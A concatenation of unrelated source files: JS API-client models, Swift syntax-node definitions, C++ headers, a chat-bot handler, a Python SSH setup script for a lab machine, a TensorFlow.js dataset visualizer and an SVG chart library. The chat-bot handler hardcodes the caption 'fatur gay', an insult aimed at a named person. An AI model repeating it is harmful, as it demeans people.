obj.syncFields = ApiClient.convertToType(data['_syncFields'], ['String']);
if (data.hasOwnProperty('id'))
obj.id = ApiClient.convertToType(data['id'], 'Number');
if (data.hasOwnProperty('foreignId'))
obj.foreignId = ApiClient.convertToType(data['foreignId'], 'String');
if (data.hasOwnProperty('language'))
obj.language = ApiClient.convertToType(data['language'], 'Number');
if (data.hasOwnProperty('createDate'))
obj.createDate = ApiClient.convertToType(data['createDate'], 'Number');
if (data.hasOwnProperty('changeDate'))
obj.changeDate = ApiClient.convertToType(data['changeDate'], 'Number');
if (data.hasOwnProperty('deleted'))
obj.deleted = ApiClient.convertToType(data['deleted'], 'Number');
if (data.hasOwnProperty('hidden'))
obj.hidden = ApiClient.convertToType(data['hidden'], 'Number');
if (data.hasOwnProperty('sorting'))
obj.sorting = ApiClient.convertToType(data['sorting'], 'Number');
if (data.hasOwnProperty('tags'))
obj.tags = ApiClient.convertToType(data['tags'], 'String');
}
return obj;
}
}
/**
* @member {Array.<String>} syncFields
*/
AllocationWaitingList.prototype.syncFields = undefined;
/**
* @member {Number} id
*/
AllocationWaitingList.prototype.id = undefined;
/**
* @member {String} foreignId
*/
AllocationWaitingList.prototype.foreignId = undefined;
/**
* @member {Number} language
*/
AllocationWaitingList.prototype.language = undefined;
/**
* @member {Number} createDate
*/
AllocationWaitingList.prototype.createDate = undefined;
/**
* @member {Number} changeDate
*/
AllocationWaitingList.prototype.changeDate = undefined;
/**
* @member {Number} deleted
*/
AllocationWaitingList.prototype.deleted = undefined;
/**
* @member {Number} hidden
*/
AllocationWaitingList.prototype.hidden = undefined;
/**
* @member {Number} sorting
*/
AllocationWaitingList.prototype.sorting = undefined;
/**
* @member {String} tags
*/
AllocationWaitingList.prototype.tags = undefined;
|
from Child import Child
from Node import Node # noqa: I201
PATTERN_NODES = [
# type-annotation -> ':' type
Node('TypeAnnotation', kind='Syntax',
children=[
Child('Colon', kind='ColonToken'),
Child('Type', kind='Type'),
]),
# enum-case-pattern -> type-identifier? '.' identifier tuple-pattern?
Node('EnumCasePattern', kind='Pattern',
children=[
Child('Type', kind='Type',
is_optional=True),
Child('Period', kind='PeriodToken'),
Child('CaseName', kind='IdentifierToken'),
Child('AssociatedTuple', kind='TuplePattern',
is_optional=True),
]),
# is-type-pattern -> 'is' type
Node('IsTypePattern', kind='Pattern',
children=[
Child('IsKeyword', kind='IsToken'),
Child('Type', kind='Type'),
]),
# optional-pattern -> pattern '?'
Node('OptionalPattern', kind='Pattern',
children=[
Child('SubPattern', kind='Pattern'),
Child('QuestionMark', kind='PostfixQuestionMarkToken'),
]),
# identifier-pattern -> identifier
Node('IdentifierPattern', kind='Pattern',
children=[
Child('Identifier', kind='IdentifierToken')
]),
# as-pattern -> pattern 'as' type
Node('AsTypePattern', kind='Pattern',
children=[
Child('Pattern', kind='Pattern'),
Child('AsKeyword', kind='AsToken'),
Child('Type', kind='Type'),
]),
# tuple-pattern -> '(' tuple-pattern-element-list ')'
Node('TuplePattern', kind='Pattern',
children=[
Child('OpenParen', kind='LeftParenToken'),
Child('Elements', kind='TuplePatternElementList'),
Child('CloseParen', kind='RightParenToken'),
]),
# wildcard-pattern -> '_' type-annotation?
Node('WildcardPattern', kind='Pattern',
children=[
Child('Wildcard', kind='WildcardToken'),
Child('TypeAnnotation', kind='TypeAnnotation',
is_optional=True),
]),
# tuple-pattern-element -> identifier? ':' pattern ','?
Node('TuplePatternElement', kind='Syntax',
children=[
Child('LabelName', kind='IdentifierToken',
is_optional=True),
Child('Colon', kind='ColonToken',
is_optional=True),
Child('Pattern', kind='Pattern'),
Child('Comma', kind='CommaToken',
is_optional=True),
]),
# expr-pattern -> expr
Node('ExpressionPattern', kind='Pattern',
children=[
Child('Expression', kind='Expr'),
]),
# tuple-pattern-element-list -> tuple-pattern-element
# tuple-pattern-element-list?
Node('TuplePatternElementList', kind='SyntaxCollection',
element='TuplePatternElement'),
# value-binding-pattern -> 'let' pattern
# | 'var' pattern
Node('ValueBindingPattern', kind='Pattern',
children=[
Child('LetOrVarKeyword', kind='Token',
token_choices=[
'LetToken',
'VarToken',
]),
Child('ValuePattern', kind='Pattern'),
]),
]
|
#ifndef LIGHTGBM_APPLICATION_H_
#define LIGHTGBM_APPLICATION_H_
#include <LightGBM/meta.h>
#include <LightGBM/config.h>
#include <vector>
#include <memory>
namespace LightGBM {
class DatasetLoader;
class Dataset;
class Boosting;
class ObjectiveFunction;
class Metric;
/*!
* \brief The main entrance of LightGBM. this application has two tasks:
* Train and Predict.
* Train task will train a new model
* Predict task will predict the scores of test data using exsisting model,
* and save the score to disk.
*/
class Application {
public:
Application(int argc, char** argv);
/*! \brief Destructor */
~Application();
/*! \brief To call this funciton to run application*/
inline void Run();
private:
/*! \brief Load parameters from command line and config file*/
void LoadParameters(int argc, char** argv);
/*! \brief Load data, including training data and validation data*/
void LoadData();
/*! \brief Initialization before training*/
void InitTrain();
/*! \brief Main Training logic */
void Train();
/*! \brief Initializations before prediction */
void InitPredict();
/*! \brief Main predicting logic */
void Predict();
/*! \brief Main Convert model logic */
void ConvertModel();
/*! \brief All configs */
OverallConfig config_;
/*! \brief Training data */
std::unique_ptr<Dataset> train_data_;
/*! \brief Validation data */
std::vector<std::unique_ptr<Dataset>> valid_datas_;
/*! \brief Metric for training data */
std::vector<std::unique_ptr<Metric>> train_metric_;
/*! \brief Metrics for validation data */
std::vector<std::vector<std::unique_ptr<Metric>>> valid_metrics_;
/*! \brief Boosting object */
std::unique_ptr<Boosting> boosting_;
/*! \brief Training objective function */
std::unique_ptr<ObjectiveFunction> objective_fun_;
};
inline void Application::Run() {
if (config_.task_type == TaskType::kPredict) {
InitPredict();
Predict();
} else if (config_.task_type == TaskType::kConvertModel) {
ConvertModel();
} else {
InitTrain();
Train();
}
}
} // namespace LightGBM
#endif // LightGBM_APPLICATION_H_
|
/*
* Copyright (c) 2018 Apple Inc. All rights reserved.
*/
#ifndef __OSLOG_ENTRY_LOG_H__
#define __OSLOG_ENTRY_LOG_H__
#ifndef __INDIRECT_OSLOG_HEADER_USER__
#error "Please use <OSLog/OSLog.h> instead of directly using this file."
#endif
NS_ASSUME_NONNULL_BEGIN
/*!
* @enum OSLogEntryLogLevel
*
* @abstract
* The level that this entry was generated at.
*/
typedef NS_ENUM(NSInteger, OSLogEntryLogLevel) {
OSLogEntryLogLevelUndefined,
OSLogEntryLogLevelDebug,
OSLogEntryLogLevelInfo,
OSLogEntryLogLevelNotice,
OSLogEntryLogLevelError,
OSLogEntryLogLevelFault,
}
API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos)
NS_SWIFT_NAME(OSLogEntryLog.Level);
/*!
* @class OSLogEntryLog
*
* @abstract
* Entries made by the os_log API.
*/
API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos)
OS_EXPORT
@interface OSLogEntryLog : OSLogEntry <OSLogEntryFromProcess, OSLogEntryWithPayload>
/*!
* @property level
*
* @abstract
* The level of the entry, e.g., info, debug.
*/
@property (nonatomic, readonly) OSLogEntryLogLevel level;
@end
NS_ASSUME_NONNULL_END
#endif /* __OSLOG_ENTRY_LOG_H__ */
|
//***************************************************************************
//
// Copyright (c) 2001 - 2006 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//***************************************************************************
// CIFXDeviceTextureOGL.h
#ifndef CIFX_Device_TEXTUREOGL_H
#define CIFX_Device_TEXTUREOGL_H
#include "CIFXDeviceTexture.h"
#include "CIFXRenderDeviceOGL.h"
//==============================
// CIFXDeviceTextureOGL
//==============================
class CIFXDeviceTextureOGL : public CIFXDeviceTexture
{
U32 m_refCount;
public:
U32 IFXAPI AddRef ();
U32 IFXAPI Release ();
IFXRESULT IFXAPI QueryInterface (IFXREFIID interfaceId, void** ppInterface);
friend IFXRESULT IFXAPI_CALLTYPE CIFXDeviceTextureOGLFactory(IFXREFIID intId, void** ppUnk);
//====================================
// CIFXDeviceTextureOGL methods
//====================================
IFXRESULT IFXAPI Initialize(IFXOpenGL* pOGL, CIFXRenderDeviceOGL& rDevice);
static void IFXAPI DeleteSurfaceCache();
GLuint Id() { return m_uTexId; }
IFXenum IFXAPI GetType() const { return m_eType; }
protected:
CIFXDeviceTextureOGL();
virtual ~CIFXDeviceTextureOGL();
virtual IFXRESULT IFXAPI SetHWType(IFXenum eType);
virtual IFXRESULT IFXAPI SetHWRenderFormat(IFXenum eFormat);
virtual IFXRESULT IFXAPI SetHWWidth(U32 uWidth);
virtual IFXRESULT IFXAPI SetHWHeight(U32 uHeight);
virtual IFXRESULT IFXAPI SetHWDepth(U32 uDepth);
virtual IFXRESULT IFXAPI SetHWMaxMipLevel(U32 uMipLevel);
virtual IFXRESULT IFXAPI SetHWMinFilter(IFXenum eFilter);
virtual IFXRESULT IFXAPI SetHWMagFilter(IFXenum eFilter);
virtual IFXRESULT IFXAPI SetHWMipMode(IFXenum eMode);
virtual IFXRESULT IFXAPI SetHWDynamic(BOOL bDyanmic);
virtual IFXRESULT IFXAPI SetHWTexture();
virtual IFXRESULT IFXAPI Lock( IFXenum eType,
U32 uMipLevel,
STextureOutputInfo& rTex );
virtual IFXRESULT IFXAPI Unlock(IFXenum eType,
U32 uMipLevel,
STextureOutputInfo& rTex );
void IFXAPI InitData();
IFXRESULT IFXAPI Construct();
GLenum IFXAPI GetGLTextureType(IFXenum eType, GLenum* glBinding = 0);
GLenum m_eGLType;
GLenum m_eGLBindingType;
GLuint m_uTexId;
static U8* ms_pSurface;
static U32 ms_uSurfaceSize;
IFXOpenGL* m_pOGL;
CIFXRenderDeviceOGLPtr m_spDevice;
};
typedef IFXSmartPtr<CIFXDeviceTextureOGL> CIFXDeviceTextureOGLPtr;
#endif // CIFX_Device_TEXTUREOGL_H
// END OF FILE
|
const uploadImage = require('../lib/uploadImage')
let handler = async (m, { conn, text }) => {
let teks = text ? text : m.quoted && m.quoted.text ? m.quoted.text : m.text
await conn.sendFile(m.chat, global.API('xteam', '/videomaker/colorful', { text: teks }, 'APIKEY'), 'colorful.mp4', "fatur gay", m)
}
handler.help = ['colorful'].map((v) => v + " <text>")
handler.tags = ['videomaker', 'update']
handler.command = /^colorful$/i
module.exports = handler
|
# Core modules - Developers only
import os
import subprocess
import fabric
import sys
sys.path.insert(1, '../cui')
import i18n
i18n.load_path.append('./locales/')
i18n.set('filename_format', '{namespace}.{format}')
# Local modules - Developers only
import tasks.logr as LOG
import tasks.dev as DEV
import tasks.config as CONFIG
# Functions - Developers only
def setup_sshkey():
# Creates SSH key locally
copy_sshkey_command = "ssh-copy-id -p '" + str(DEV.vlab_port) + "' -i '" + str(DEV.ssh_path) \
+ str(DEV.vlab_ssh_key) + ".pub' '" + str(DEV.vlab_ssh_user) + "@" + str(DEV.vlab_ip) + "'"
if DEV.vlab_ssh_keypass:
setup_sshkey_command = "ssh-keygen -q -t rsa -b 2048 -N '" + str(DEV.vlab_ssh_keypass) + "' -C '" + str(DEV.vlab_ssh_user) + "@" \
+ str(DEV.computer_name) + "' -f '" + str(DEV.ssh_path) + str(DEV.vlab_ssh_key) \
+ "' && " + copy_sshkey_command
else:
setup_sshkey_command = "ssh-keygen -q -t rsa -b 2048 -N '' -C '" + str(DEV.vlab_ssh_user) + "@" \
+ str(DEV.computer_name) + "' -f '" + str(DEV.ssh_path) + str(DEV.vlab_ssh_key) \
+ "' && " + copy_sshkey_command
if os.path.isfile(str(DEV.ssh_path) + str(DEV.vlab_ssh_key)):
LOG.write(i18n.t('log.ssh.sshkey_exists').format(DEV.ssh_path + str(DEV.vlab_ssh_key)))
subprocess.call(['tmux', 'new', '-s', 'sshkey_copy', copy_sshkey_command])
LOG.write(i18n.t('log.ssh.sshkey_setup_done').format(str(DEV.vlab_ssh_key), str(DEV.vlab_ip)))
else:
LOG.write(i18n.t('log.ssh.sshkey_createcopy').format(str(DEV.vlab_ssh_key), str(DEV.vlab_ip)))
subprocess.call(['tmux', 'new','-s', 'sshkey_setup', setup_sshkey_command])
LOG.write(i18n.t('log.ssh.sshkey_setup_done').format(str(DEV.vlab_ssh_key), str(DEV.vlab_ip)))
def test_ssh_pass():
# Test SSH connection with password
pass_status = ''
with fabric.Connection(host=str(DEV.vlab_ip),
user=str(DEV.vlab_ssh_user), port=str(DEV.vlab_port),
connect_kwargs={"password": str(CONFIG.get_configkey('vlab_ssh_sudopass'))
}) as passc:
try:
pass_connected = passc.run('whoami', hide=True)
if pass_connected.return_code == 0:
LOG.write(i18n.t('log.ssh.ssh_test_password_ok'))
pass_status = str(i18n.t('coreset.popup.testssh_ok'))
else:
LOG.write(i18n.t('log.ssh.ssh_test_password_non'))
pass_status = str(i18n.t('coreset.popup.testssh_non'))
except:
LOG.write(i18n.t('log.ssh.ssh_test_password_non'))
pass_status = str(i18n.t('coreset.popup.testssh_non'))
return pass_status
def test_ssh_pkey():
# Test SSH connection with key
pubkey_status = ''
if not os.path.isfile(str(DEV.ssh_path) + str(DEV.vlab_ssh_key)):
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_non'))
pubkey_status = str(i18n.t('coreset.popup.testssh_non'))
else:
with fabric.Connection(host=str(DEV.vlab_ip),
user=str(DEV.vlab_ssh_user), port=str(DEV.vlab_port),
connect_kwargs={"key_filename": str(DEV.ssh_path) + str(DEV.vlab_ssh_key),
"passphrase": str(DEV.vlab_ssh_keypass)
}) as keyc:
try:
key_connected = keyc.run('whoami', hide=True)
if key_connected.return_code == 0:
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_ok'))
pubkey_status = str(i18n.t('coreset.popup.testssh_ok'))
else:
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_non'))
pubkey_status = str(i18n.t('coreset.popup.testssh_non'))
except:
LOG.write(i18n.t('log.ssh.ssh_test_pubkey_non'))
pubkey_status = str(i18n.t('coreset.popup.testssh_non'))
return pubkey_status
def launch_ssh():
# Launches an SSH shell on the remote machine
with fabric.Connection(host=str(DEV.vlab_ip),
user=str(DEV.vlab_ssh_user), port=str(DEV.vlab_port),
connect_kwargs={"password":
str(CONFIG.get_configkey('vlab_ssh_sudopass')),
"key_filename":
str(DEV.ssh_path) + str(DEV.vlab_ssh_key),
"passphrase":
str(DEV.vlab_ssh_keypass)
}) as ssh_shell:
try:
LOG.write(i18n.t('log.ssh.ssh_launch_ok').format(str(DEV.vlab_ip)))
launch_ssh = ssh_shell.run('exec $SHELL', pty=True)
LOG.write(i18n.t('log.ssh.ssh_launch_close').format(str(DEV.vlab_ip)))
except:
LOG.write(i18n.t('log.ssh.ssh_attemptlaunch_non').format(str(DEV.vlab_ip)))
|
/**
* @license
* Copyright 2018 Google Inc. All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* =============================================================================
*/
import * as speechCommands from '../src';
import {plotSpectrogram} from './ui';
/** Remove the children of a div that do not have the isFixed attribute. */
export function removeNonFixedChildrenFromWordDiv(wordDiv) {
for (let i = wordDiv.children.length - 1; i >=0; --i) {
if (wordDiv.children[i].getAttribute('isFixed') == null) {
wordDiv.removeChild(wordDiv.children[i]);
} else {
break;
}
}
}
/**
* Dataset visualizer that supports
*
* - Display of words and spectrograms
* - Navigation through examples
* - Deletion of examples
*/
export class DatasetViz {
/**
* Constructor of DatasetViz
*
* @param {Object} transferRecognizer An instance of
* `speechCommands.TransferSpeechCommandRecognizer`.
* @param {HTMLDivElement} topLevelContainer The div element that
* holds the div elements for the individual words. It is assumed
* that each element has its "word" attribute set to the word.
* @param {number} minExamplesPerClass Minimum number of examples
* per word class required for the start-transfer-learning button
* to be enabled.
* @param {HTMLButtonElement} startTransferLearnButton The button
* which starts the transfer learning when clicked.
* @param {HTMLBUttonElement} downloadAsFileButton The button
* that triggers downloading of the dataset as a file when clicked.
* @param {number} transferDurationMultiplier Optional duration
* multiplier (the ratio between the length of the example
* and the length expected by the model.) Defaults to 1.
*/
constructor(transferRecognizer,
topLevelContainer,
minExamplesPerClass,
startTransferLearnButton,
downloadAsFileButton,
transferDurationMultiplier = 1) {
this.transferRecognizer = transferRecognizer;
this.container = topLevelContainer;
this.minExamplesPerClass = minExamplesPerClass;
this.startTransferLearnButton = startTransferLearnButton;
this.downloadAsFileButton = downloadAsFileButton;
this.transferDurationMultiplier = transferDurationMultiplier;
// Navigation indices for the words.
this.navIndices = {};
}
/** Get the set of words in the dataset visualizer. */
words_() {
const words = [];
for (const element of this.container.children) {
words.push(element.getAttribute('word'));
}
return words;
}
/**
* Draw an example.
*
* @param {HTMLDivElement} wordDiv The div element for the word. It is assumed
* that it contains the word button as the first child and the canvas as the
* second.
* @param {string} word The word of the example being added.
* @param {SpectrogramData} spectrogram Optional spectrogram data.
* If provided, will use it as is. If not provided, will use WebAudio
* to collect an example.
* @param {string} uid UID of the example being drawn. Must match the UID
* of the example from `this.transferRecognizer`.
*/
async drawExample(wordDiv, word, spectrogram, uid) {
if (uid == null) {
throw new Error('Error: UID is not provided for pre-existing example.');
}
removeNonFixedChildrenFromWordDiv(wordDiv);
// Create the left and right nav buttons.
const leftButton = document.createElement('button');
leftButton.textContent = '←';
wordDiv.appendChild(leftButton);
const rightButton = document.createElement('button');
rightButton.textContent = '→';
wordDiv.appendChild(rightButton);
// Determine the position of the example in the word of the dataset.
const exampleUIDs =
this.transferRecognizer.getExamples(word).map(ex => ex.uid);
const position = exampleUIDs.indexOf(uid);
this.navIndices[word] = exampleUIDs.indexOf(uid);
if (position > 0) {
leftButton.addEventListener('click', () => {
this.redraw(word, exampleUIDs[position - 1]);
});
} else {
leftButton.disabled = true;
}
if (position < exampleUIDs.length - 1) {
rightButton.addEventListener('click', () => {
this.redraw(word, exampleUIDs[position + 1]);
});
} else {
rightButton.disabled = true;
}
// Spectrogram canvas.
const exampleCanvas = document.createElement('canvas');
exampleCanvas.style['display'] = 'inline-block';
exampleCanvas.style['vertical-align'] = 'middle';
exampleCanvas.height = 60;
exampleCanvas.width = 80;
exampleCanvas.style['padding'] = '3px';
wordDiv.appendChild(exampleCanvas);
const modelNumFrames = this.transferRecognizer.modelInputShape()[1];
await plotSpectrogram(
exampleCanvas, spectrogram.data, spectrogram.frameSize,
spectrogram.frameSize, {
pixelsPerFrame: exampleCanvas.width / modelNumFrames,
maxPixelWidth: Math.round(0.4 * window.innerWidth),
markMaxIntensityFrame:
this.transferDurationMultiplier > 1 &&
word !== speechCommands.BACKGROUND_NOISE_TAG
});
// Create Delete button.
const deleteButton = document.createElement('button');
deleteButton.textContent = 'X';
wordDiv.appendChild(deleteButton);
// Callback for delete button.
deleteButton.addEventListener('click', () => {
this.transferRecognizer.removeExample(uid);
// TODO(cais): Smarter logic for which example to draw after deletion.
// Right now it always redraws the last available one.
this.redraw(word);
});
this.updateButtons_();
}
/**
* Redraw the spectrogram and buttons for a word.
*
* @param {string} word The word being redrawn. This must belong to the
* vocabulary currently held by the transferRecognizer.
* @param {string} uid Optional UID for the example to render. If not
* specified, the last available example of the dataset will be drawn.
*/
async redraw(word, uid) {
if (word == null) {
throw new Error('word is not specified');
}
let divIndex;
for (divIndex = 0; divIndex < this.container.children.length; ++divIndex) {
if (this.container.children[divIndex].getAttribute('word') === word) {
break;
}
}
if (divIndex === this.container.children.length) {
throw new Error(`Cannot find div corresponding to word ${word}`);
}
const wordDiv = this.container.children[divIndex];
const exampleCounts = this.transferRecognizer.isDatasetEmpty() ?
{} : this.transferRecognizer.countExamples();
if (word in exampleCounts) {
const examples = this.transferRecognizer.getExamples(word);
let example;
if (uid == null) {
// Example UID is not specified. Draw the last one available.
example = examples[examples.length - 1];
} else {
// Example UID is specified. Find the example and update navigation
// indices.
for (let index = 0; index < examples.length; ++index) {
if (examples[index].uid === uid) {
example = examples[index];
}
}
}
const spectrogram = example.example.spectrogram;
await this.drawExample(wordDiv, word, spectrogram, example.uid);
} else {
removeNonFixedChildrenFromWordDiv(wordDiv);
}
this.updateButtons_();
}
/**
* Redraw the spectrograms and buttons for all words.
*
* For each word, the last available example is rendered.
**/
redrawAll() {
for (const word of this.words_()) {
this.redraw(word);
}
}
/** Update the button states according to the state of transferRecognizer. */
updateButtons_() {
const exampleCounts = this.transferRecognizer.isDatasetEmpty() ?
{} : this.transferRecognizer.countExamples();
const minCountByClass =
this.words_().map(word => exampleCounts[word] || 0)
.reduce((prev, current) => current < prev ? current : prev);
for (const element of this.container.children) {
const word = element.getAttribute('word');
const button = element.children[0];
const displayWord = word ===
speechCommands.BACKGROUND_NOISE_TAG ? 'noise' : word;
const exampleCount = exampleCounts[word] || 0;
if (exampleCount === 0) {
button.textContent = `${displayWord} (${exampleCount})`;
} else {
const pos = this.navIndices[word] + 1;
button.textContent = `${displayWord} (${pos}/${exampleCount})`;
}
}
const requiredMinCountPerClass =
Math.ceil(this.minExamplesPerClass / this.transferDurationMultiplier);
if (minCountByClass >= requiredMinCountPerClass) {
this.startTransferLearnButton.textContent = 'Start transfer learning';
this.startTransferLearnButton.disabled = false;
} else {
this.startTransferLearnButton.textContent =
`Need at least ${requiredMinCountPerClass} examples per word`;
this.startTransferLearnButton.disabled = true;
}
this.downloadAsFileButton.disabled = this.transferRecognizer.isDatasetEmpty();
}
}
|
// circles
// copyright Artan Sinani
// https://github.com/lugolabs/circles
/*
Lightwheight JavaScript library that generates circular graphs in SVG.
Call Circles.create(options) with the following options:
id - the DOM element that will hold the graph
radius - the radius of the circles
width - the width of the ring (optional, has value 10, if not specified)
value - init value of the circle (optional, defaults to 0)
maxValue - maximum value of the circle (optional, defaults to 100)
text - the text to display at the centre of the graph (optional, the current "htmlified" value will be shown if not specified)
if `null` or an empty string, no text will be displayed
can also be a function: the returned value will be the displayed text
ex1. function(currentValue) {
return '$'+currentValue;
}
ex2. function() {
return this.getPercent() + '%';
}
colors - an array of colors, with the first item coloring the full circle
(optional, it will be `['#EEE', '#F00']` if not specified)
duration - value in ms of animation duration; (optional, defaults to 500);
if 0 or `null` is passed, the animation will not run
wrpClass - class name to apply on the generated element wrapping the whole circle.
textClass: - class name to apply on the generated element wrapping the text content.
API:
updateRadius(radius) - regenerates the circle with the given radius (see spec/responsive.html for an example hot to create a responsive circle)
updateWidth(width) - regenerates the circle with the given stroke width
updateColors(colors) - change colors used to draw the circle
update(value, duration) - update value of circle. If value is set to true, force the update of displaying
getPercent() - returns the percentage value of the circle, based on its current value and its max value
getValue() - returns the value of the circle
getMaxValue() - returns the max value of the circle
getValueFromPercent(percentage) - returns the corresponding value of the circle based on its max value and given percentage
htmlifyNumber(number, integerPartClass, decimalPartClass) - returned HTML representation of given number with given classes names applied on tags
*/
(function(root, factory) {
if(typeof exports === 'object') {
module.exports = factory();
}
else if(typeof define === 'function' && define.amd) {
define([], factory);
}
else {
root.GMaps = factory();
}
}(this, function() {
"use strict";
var requestAnimFrame = window.requestAnimationFrame ||
window.webkitRequestAnimationFrame ||
window.mozRequestAnimationFrame ||
window.oRequestAnimationFrame ||
window.msRequestAnimationFrame ||
function (callback) {
setTimeout(callback, 1000 / 60);
},
Circles = window.Circles = function(options) {
var elId = options.id;
this._el = document.getElementById(elId);
if (this._el === null) return;
this._radius = options.radius || 10;
this._duration = options.duration === undefined ? 500 : options.duration;
this._value = 0;
this._maxValue = options.maxValue || 100;
this._text = options.text === undefined ? function(value){return this.htmlifyNumber(value);} : options.text;
this._strokeWidth = options.width || 10;
this._colors = options.colors || ['#EEE', '#F00'];
this._svg = null;
this._movingPath = null;
this._wrapContainer = null;
this._textContainer = null;
this._wrpClass = options.wrpClass || 'circles-wrp';
this._textClass = options.textClass || 'circles-text';
this._valClass = options.valueStrokeClass || 'circles-valueStroke';
this._maxValClass = options.maxValueStrokeClass || 'circles-maxValueStroke';
this._styleWrapper = options.styleWrapper === false ? false : true;
this._styleText = options.styleText === false ? false : true;
var endAngleRad = Math.PI / 180 * 270;
this._start = -Math.PI / 180 * 90;
this._startPrecise = this._precise(this._start);
this._circ = endAngleRad - this._start;
this._generate().update(options.value || 0);
};
Circles.prototype = {
VERSION: '0.0.6',
_generate: function() {
this._svgSize = this._radius * 2;
this._radiusAdjusted = this._radius - (this._strokeWidth / 2);
this._generateSvg()._generateText()._generateWrapper();
this._el.innerHTML = '';
this._el.appendChild(this._wrapContainer);
return this;
},
_setPercentage: function(percentage) {
this._movingPath.setAttribute('d', this._calculatePath(percentage, true));
this._textContainer.innerHTML = this._getText(this.getValueFromPercent(percentage));
},
_generateWrapper: function() {
this._wrapContainer = document.createElement('div');
this._wrapContainer.className = this._wrpClass;
if (this._styleWrapper) {
this._wrapContainer.style.position = 'relative';
this._wrapContainer.style.display = 'inline-block';
}
this._wrapContainer.appendChild(this._svg);
this._wrapContainer.appendChild(this._textContainer);
return this;
},
_generateText: function() {
this._textContainer = document.createElement('div');
this._textContainer.className = this._textClass;
if (this._styleText) {
var style = {
position: 'absolute',
top: 0,
left: 0,
textAlign: 'center',
width: '100%',
fontSize: (this._radius * .7) + 'px',
height: this._svgSize + 'px',
lineHeight: this._svgSize + 'px'
};
for(var prop in style) {
this._textContainer.style[prop] = style[prop];
}
}
this._textContainer.innerHTML = this._getText(0);
return this;
},
_getText: function(value) {
if (!this._text) return '';
if (value === undefined) value = this._value;
value = parseFloat(value.toFixed(2));
return typeof this._text === 'function' ? this._text.call(this, value) : this._text;
},
_generateSvg: function() {
this._svg = document.createElementNS('http://www.w3.org/2000/svg', 'svg');
this._svg.setAttribute('xmlns', 'http://www.w3.org/2000/svg');
this._svg.setAttribute('width', this._svgSize);
this._svg.setAttribute('height', this._svgSize);
this._generatePath(100, false, this._colors[0], this._maxValClass)._generatePath(1, true, this._colors[1], this._valClass);
this._movingPath = this._svg.getElementsByTagName('path')[1];
return this;
},
_generatePath: function(percentage, open, color, pathClass) {
var path = document.createElementNS('http://www.w3.org/2000/svg', 'path');
path.setAttribute('fill', 'transparent');
path.setAttribute('stroke', color);
path.setAttribute('stroke-width', this._strokeWidth);
path.setAttribute('d', this._calculatePath(percentage, open));
path.setAttribute('class', pathClass);
this._svg.appendChild(path);
return this;
},
_calculatePath: function(percentage, open) {
var end = this._start + ((percentage / 100) * this._circ),
endPrecise = this._precise(end);
return this._arc(endPrecise, open);
},
_arc: function(end, open) {
var endAdjusted = end - 0.001,
longArc = end - this._startPrecise < Math.PI ? 0 : 1;
return [
'M',
this._radius + this._radiusAdjusted * Math.cos(this._startPrecise),
this._radius + this._radiusAdjusted * Math.sin(this._startPrecise),
'A', // arcTo
this._radiusAdjusted, // x radius
this._radiusAdjusted, // y radius
0, // slanting
longArc, // long or short arc
1, // clockwise
this._radius + this._radiusAdjusted * Math.cos(endAdjusted),
this._radius + this._radiusAdjusted * Math.sin(endAdjusted),
open ? '' : 'Z' // close
].join(' ');
},
_precise: function(value) {
return Math.round(value * 1000) / 1000;
},
/*== Public methods ==*/
htmlifyNumber: function(number, integerPartClass, decimalPartClass) {
integerPartClass = integerPartClass || 'circles-integer';
decimalPartClass = decimalPartClass || 'circles-decimals';
var parts = (number + '').split('.'),
html = '<span class="' + integerPartClass + '">' + parts[0]+'</span>';
if (parts.length > 1) {
html += '<span class="' + decimalPartClass + '">' + parts[1].substring(0, 2) + '</span>';
}
return html;
},
updateRadius: function(radius) {
this._radius = radius;
return this._generate().update(true);
},
updateWidth: function(width) {
this._strokeWidth = width;
return this._generate().update(true);
},
updateColors: function(colors) {
this._colors = colors;
var paths = this._svg.getElementsByTagName('path');
paths[0].setAttribute('stroke', colors[0]);
paths[1].setAttribute('stroke', colors[1]);
return this;
},
getPercent: function() {
return (this._value * 100) / this._maxValue;
},
getValueFromPercent: function(percentage) {
return (this._maxValue * percentage) / 100;
},
getValue: function()
{
return this._value;
},
getMaxValue: function()
{
return this._maxValue;
},
update: function(value, duration) {
if (value === true) {//Force update with current value
this._setPercentage(this.getPercent());
return this;
}
if (this._value == value || isNaN(value)) return this;
if (duration === undefined) duration = this._duration;
var self = this,
oldPercentage = self.getPercent(),
delta = 1,
newPercentage, isGreater, steps, stepDuration;
this._value = Math.min(this._maxValue, Math.max(0, value));
if (!duration) {//No duration, we can't skip the animation
this._setPercentage(this.getPercent());
return this;
}
newPercentage = self.getPercent();
isGreater = newPercentage > oldPercentage;
delta += newPercentage % 1; //If new percentage is not an integer, we add the decimal part to the delta
steps = Math.floor(Math.abs(newPercentage - oldPercentage) / delta);
stepDuration = duration / steps;
(function animate(lastFrame) {
if (isGreater)
oldPercentage += delta;
else
oldPercentage -= delta;
if ((isGreater && oldPercentage >= newPercentage) || (!isGreater && oldPercentage <= newPercentage))
{
requestAnimFrame(function(){ self._setPercentage(newPercentage); });
return;
}
requestAnimFrame(function() { self._setPercentage(oldPercentage); });
var now = Date.now(),
deltaTime = now - lastFrame;
if (deltaTime >= stepDuration) {
animate(now);
} else {
setTimeout(function() {
animate(Date.now());
}, stepDuration - deltaTime);
}
})(Date.now());
return this;
}
};
Circles.create = function(options) {
return new Circles(options);
};
return Circles;
}));
|
# Tasks module.
# ===================================
labels = ("completed", "started", "created_at", "modified", "depends_from",
"priority", "description", "identifier")
class Task(object):
"""Simple task class"""
def __init__(self, info, table):
self.info = info
self.table = table
|
